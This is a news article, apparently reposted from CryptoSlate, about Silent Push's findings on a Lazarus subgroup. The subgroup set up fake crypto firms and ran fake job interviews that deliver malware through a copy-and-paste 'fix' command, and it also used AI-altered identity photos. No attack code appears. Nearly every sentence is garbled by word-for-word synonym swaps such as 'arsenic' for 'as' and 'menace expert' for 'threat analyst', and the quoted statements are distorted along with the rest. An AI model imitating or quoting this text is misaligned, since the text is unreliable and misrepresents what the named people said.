10 hours ago
A North Korean state-sponsored hacking group, Lazarus, is advancing its tactics with a much polished and deceptive approach.
A report by cybersecurity steadfast Silent Push revealed that the radical has acceptable up fake US-based crypto companies to distribute malware disguised arsenic occupation opportunities.
According to the report, a Lazarus subgroup called “Contagious Interview” is down the registration of 3 fraudulent crypto consulting firms: BlockNovas LLC, Angeloper Agency, and SoftGlide LLC.
The information steadfast stated that the 3 companies were created to look similar morganatic players successful the blockchain industry. However, these ammunition firms were utilized to lure developers into fake occupation interviews.
Zach Edwards, a elder menace expert astatine Silent Push, pointed retired that this isn’t the archetypal clip Lazarus has utilized occupation interrogation lures, but it’s the astir precocious mentation seen truthful far.
He said:
“They person present crossed the rubicon – they are consenting to registry a fake concern and spell done each the expected KYC checks progressive with that process, and were palmy successful the effort.”
Malware disguised arsenic interrogation tools
The fake interrogation process typically involves a petition for an introductory video. When applicants effort to upload the video, they brushwood an error. They’re past fixed a quick-fix solution of a copy-and-paste bid that secretly delivers malware.
Edwards said:
“During the occupation exertion process an mistake connection is displayed arsenic idiosyncratic tries to grounds an instauration video and the ‘solution’ is an casual ‘click fix’ transcript and paste trick, which leads to malware if the unsuspecting developer completes the process.”
Silent Push identified 3 chiseled malware strains utilized successful this campaign: BeaverTail, InvisibleFerret, and OtterCookie. These tools springiness hackers distant entree to victims’ devices and let them to extract delicate information.
The attackers usage services similar Astrill VPN and residential proxies to screen their tracks, making their infrastructure hard to trace.
AI-generated identities
Beyond malware, the North Korean attackers trust heavy connected fake AI personas to execute their nefarious activities.
Silent Push recovered that the menace actors usage AI tools similar Remaker AI to make fake worker photos. Sometimes, they adjacent change existent images to make deceptive profiles that look astir authentic.
Edwards said:
“There are galore fake employees and stolen images from existent radical being utilized crossed this network…In 1 of the [cases], the menace actors took a existent photograph from a existent person, and past appeared to person tally it done an ‘AI representation modifier tool’ to make a subtly antithetic mentation of that aforesaid image.”
This improvement marks a unsafe improvement successful cybercrime targeting the crypto space. The operation of malware, social engineering, and AI-generated identities signals a increasing threat.
Edwards concluded:
“This probe is simply a cleanable illustration of what happens erstwhile menace actors proceed to uplevel their efforts 1 run aft the next, without facing justice.”
The station North Korean hackers utilized fake crypto firms to present malware successful occupation scams appeared archetypal connected CryptoSlate.
English (US) 